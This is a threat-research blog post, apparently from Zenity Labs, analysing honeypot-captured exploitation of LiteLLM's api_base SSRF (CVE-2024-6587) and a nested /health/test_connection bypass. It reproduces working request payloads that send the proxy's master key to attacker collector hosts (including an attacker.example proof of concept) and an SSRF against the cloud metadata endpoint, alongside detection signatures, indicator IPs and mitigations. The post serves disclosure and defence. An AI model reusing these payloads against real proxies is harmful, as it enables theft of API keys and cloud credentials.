• Zenity Labs
  • Posts
  • Threat Actors Are Trying to Turn LiteLLM's Connection-Test Into a Key-Exfiltration Channel

Threat Actors Are Trying to Turn LiteLLM's Connection-Test Into a Key-Exfiltration Channel

A closer look at api_base SSRF (CVE-2024-6587) activity in the wild, and its nested variant

Over April to June 2026, our honeypot sensors recorded more than 2,000 requests against LiteLLM's admin API: setting api_base to an attacker-controlled host and api_key to os.environ/LITELLM_MASTER_KEY.

This pattern abuses CVE-2024-6587, a Server-Side Request Forgery (SSRF) flaw disclosed on 2024-09-13 and fixed in LiteLLM 1.44.8. The catch is that the bulk of what we saw does not hit the endpoint the patch protects. Rather, it hits a nested variant mentioned in niche cybersecurity blogs

LiteLLM and api_base: the connection-test as attack surface

LiteLLM is a widely deployed AI gateway that fronts many LLM providers behind one OpenAI-style API. api_base is simply the upstream URL LiteLLM forwards a given model’s requests to, for example https://api.openai.com. Also relevant to the suspicious activity caught by our sensors is the /health/test_connection endpoint. This is a convenience meant for developers, a “does this model config actually work?” button that takes a model config, including api_base, and makes an outbound call to test it. The api_field parameter supplies the where to the endpoint which supplies the go.

The api_base SSRF: CVE-2024-6587

CVE-2024-6587 covers the POST /chat/completions endpoint. A LiteLLM proxy is configured with an OpenAI key in its environment (OPENAI_API_KEY); when a request sets api_base to a server the attacker controls, the proxy forwards the request, and that configured key, to that server, where the attacker simply reads it from their own logs (CVSS 7.5). This is the original report's proof of concept looks like this (huntr 4001e1a2, NVD):

POST /chat/completions

{"model": "gpt-3.5-turbo",
 "messages": [{"role": "user", "content": "hello"}],
 "api_base": "https://attacker.example"}

The 1.44.8 fix added a guard, is_request_body_safe(), that rejects api_base in the request body. But that guard is a flat, top-level check. It looks for api_base as a top-level key and never recurses into the litellm_params object.. So any endpoint that nests api_base inside litellm_params, like /health/test_connection and /model/new, sails straight past the check. That nested bypass is the live variant we observed

The nested /health/test_connection variant stayed exploitable far longer, we reproduced the full secret-exfil on v1.74.0, v1.81.0, and v1.82.0. It was finally closed in LiteLLM's 1.83.x hardening: our lab saw that on v1.83.14 (released on 04-27-2026) the same request is rejected with "Environment variable references are not permitted in request parameters." 

Design pattern exposure

Three design choices create the exposure:

  • The proxy trusts a client-supplied api_base and will connect to it.

  • It resolves os.environ/VAR references server-side, a documented config convenience (LiteLLM's own quickstart config uses api_key: os.environ/AZURE_API_KEY).

  • So api_key: "os.environ/LITELLM_MASTER_KEY" is replaced, on the wire, with the real key stored in the environment and sent over to the attacker controlled server (supplied in the api_base field).

  • The CVE-2024-6587 fix checks only the top-level request body, leaving the nested sinks reachable. 1.83.x hardening blocked os.environ references in request bodies.

Suspicious activity breakdown

  • We captured 2,721 requests from 21 source IPs, between 2026-04-07 and 2026-06-01.

  • The split tells the story: 2,704 hit POST /health/test_connection (the nested variant), 16 hit POST /chat/completions (the classic CVE shape, all aimed at cloud metadata), and 1 hit POST /model/new.

  • All 2,704 /health/test_connection requests used a single spoofed desktop-Chrome User-Agent across many cloud IPs, the signature of one automated tool behind rotating addresses. Each IP appeared on a single day, typically sending exactly 159 requests.

The exact request, and what the proxy does with it

This is the captured /health/test_connection body, verbatim (only the api_base host varied across sources):

POST /health/test_connection HTTP/1.1
Host: <litellm-host>:4000
Authorization: Bearer sk-1234
Content-Type: application/json

{"litellm_params":{
   "model":"azure/gpt-4o",
   "custom_llm_provider":"azure",
   "api_base":"http://8.211.153.13:18182/openai/v1",
   "api_key":"os.environ/LITELLM_MASTER_KEY",
   "api_version":"2024-12-01-preview",
   "extra_headers":{"api-key-site":"http://<victim-proxy>:4000",
                    "api-key-env":"LITELLM_MASTER_KEY"}
   },
 "mode":"chat"}

Three things to notice:

  • api_base points at an attacker host (8.211.153.13:18182), the collector that will receive the proxy's outbound call.

  • api_key is the literal string os.environ/LITELLM_MASTER_KEY, which is an instruction telling LiteLLM to read that environment variable and use its value rather than a literal key.

  • extra_headers is attacker bookkeeping: api-key-site is set to the victim sensor's own address (so the operator knows which target phoned home) and api-key-env records which environment variable is being harvested.

We reproduced it: os.environ/LITELLM_MASTER_KEY is resolved to the real key on the wire

To see what a real vulnerable proxy does, we replayed the captured request against a live LiteLLM instance (v1.74.0) with a master key set to sk-1234, pointing api_base at a logging collector. The request goes in with an os.environ directive, and the proxy's outbound call arrives at the collector with the secret resolved:

POST /openai/v1/openai/deployments/gpt-4o/chat/completions?api-version=2024-12-01-preview
host: <collector>
api-key: sk-1234                          <-- os.environ/LITELLM_MASTER_KEY resolved to the real master key
api-key-site: http://<victim-proxy>:4000  <-- attacker bookkeeping, echoed onto the outbound
api-key-env: LITELLM_MASTER_KEY
user-agent: AsyncAzureOpenAI/Python 2.41.1
content-type: application/json

{"messages":[{"role":"user","content":"What's 1 + 1?"}],"model":"gpt-4o"}

The proxy then reports success to the caller, while the stolen key was sent to the given, attacker controlled, api endpoint. That is the entire exploit: in as os.environ/LITELLM_MASTER_KEY, out as api-key: sk-1234

Authentication: /health/test_connection is gated only if a master key, otherwise known as the key to the AI Gateway, is set. We tested the conditions that let the captured request execute on a real proxy:

Deployment state

Request

Result

master key = sk-1234 (the docs example)

Authorization: Bearer sk-1234

call fires (attacker knows the example key, can hijack other keys on the proxy)

no master key set

no Authorization header

call fires (any request is accepted)

no master key set

Authorization: Bearer sk-<RANDOM>

call fires (any token is accepted)

In other words, the attack lands when the proxy has no master key (any token or none is accepted) or left as the docs-default (also seen in .env.example) sk-1234 (which the attacker simply knows).

The other interesting shape:  SSRF into the IMDS endpoint 

The 16 /chat/completions requests pointed api_base at the cloud metadata service:

POST /chat/completions

{"model":"gpt-4","api_base":"http://169.254.169.254/latest/meta-data/",
 "messages":[{"role":"user","content":"x"}]}

169.254.169.254 is the link-local address every major cloud uses for instance metadata, the path to short-lived IAM credentials. On a vulnerable proxy this is SSRF straight into the cloud identity of the host. 

Assessment

What sets the activity apart is the payload: these are working secret-exfiltration primitives aimed at two fixed, attacker-controlled collectors, so the harvesting intent is built into the request itself. In addition, when we run the source IPs through VirusTotal, we understand more about who we're dealing with. Several are already flagged as malicious by multiple vendors, all three of them running the /health/test_connection secret-harvesting sweep (the os.environ exfiltration to the attacker's collectors): 

  1. 135.232.232.53 (159 requests)

  2. 52.161.69.168 (106 requests) 

  3. 172.190.102.150 (53 requests) 

Notably, every flagged sender is a Microsoft Azure address (AS 8075), pointing to abused cloud accounts rather than the operator's own hosts. Furthermore, the two smaller actors are flagged as well: 

  1. the metadata-SSRF IP 164.52.192.134 (MalwareURL, SOCRadar, GreyNoise), which pointed api_base at the cloud metadata service to pull the host's IAM credentials and also appears in our LiteLLM guardrails and control-plane findings,

  2. the /model/new IP 191.102.179.47 (GreyNoise), which planted an attacker-controlled api_base into a stored model.

What to block

Abused endpoints

Alert on any external POST to LiteLLM admin endpoints whose body carries an api_base:

  • /health/test_connection

  • /chat/completions

  • /model/new

Request-body signatures

  • An api_base pointing off-box combined with "api_key":"os.environ/..." (any environment-variable reference), and any api_base set to 169.254.169.254.

  • Attacker bookkeeping: extra_headers carrying api-key-site and api-key-env, which fingerprint this tool.

Collector hosts (key-exfil destinations)

IPs for outbound LiteLLM traffic

  • 8.211.153.13

  • 138.2.105.182

Source IPs (every IP we saw, with attributed activity)

Secret-harvesting sweep

os.environ exfil via /health/test_connection, exfiltrating to collector 8.211.153.13:18182

  • 47.251.51.235

  • 43.110.133.208

  • 47.251.252.26

  • 52.161.178.107

  • 64.236.201.21

  • 47.251.15.169

  • 128.24.161.192

  • 135.232.232.53

  • 192.240.199.159

  • 192.240.199.139

  • 131.153.241.57

  • 52.161.69.168

  • 172.190.102.150

Secret-harvesting sweep, exfiltrating to collector 138.2.105.182

  • 192.240.199.127 

  • 125.253.75.79

  • 131.153.240.133

  • 125.253.88.99

  • 192.240.199.97

  • 34.229.38.104

Cloud-metadata SSRF via /chat/completions:

  • 164.52.192.134 (16: 14 at 169.254.169.254, 2 at its own host 164.52.192.134:8888; also seen in our guardrails and control-plane findings)

Config-persistence via /model/new:

  • 191.102.179.47 (1: planted api_base: http://127.0.0.1:1 into a stored model)

Recommendations

  • Set a strong master key, and make sure one is set at all. With no master key, LiteLLM accepts any token; with the docs-default sk-1234, the attacker already knows it. Rotate LITELLM_MASTER_KEY off any default and treat it as compromised if a default was ever live.

  • Egress-filter the proxy: deny outbound model traffic to link-local and metadata addresses (169.254.169.254), loopback, RFC-1918 ranges and any other unapproved host. The in-app guard does not cover the nested sinks.

  • Upgrade past 1.44.8, but do not rely on it alone for /health/test_connection; keep the control plane on an internal network behind auth. Upgrade to LiteLLM ≥ 1.83.x. We confirmed v1.83.14 rejects os.environ references in request parameters, which closes this secret-theft

Why it matters

This is automated credential theft, and we verified the payoff in the lab: a single connection-test request makes a vulnerable proxy hand its keys in os.environ to an attacker-controlled server, or fetch cloud metadata for IAM credentials. With such  keys, an attacker can control the gateway and bill inference to the victim; with metadata credentials, they pivot into the cloud account. The patch closed the front door (/chat/completions) eighteen months ago, and this activity is attackers walking in through a side door of the same design pattern left open.

  1. CVE-2024-6587: GitHub Advisory GHSA-g26j-5385-hhw3 and NVD.

  2. Escape: the nested api_base bypass

Reply

or to participate.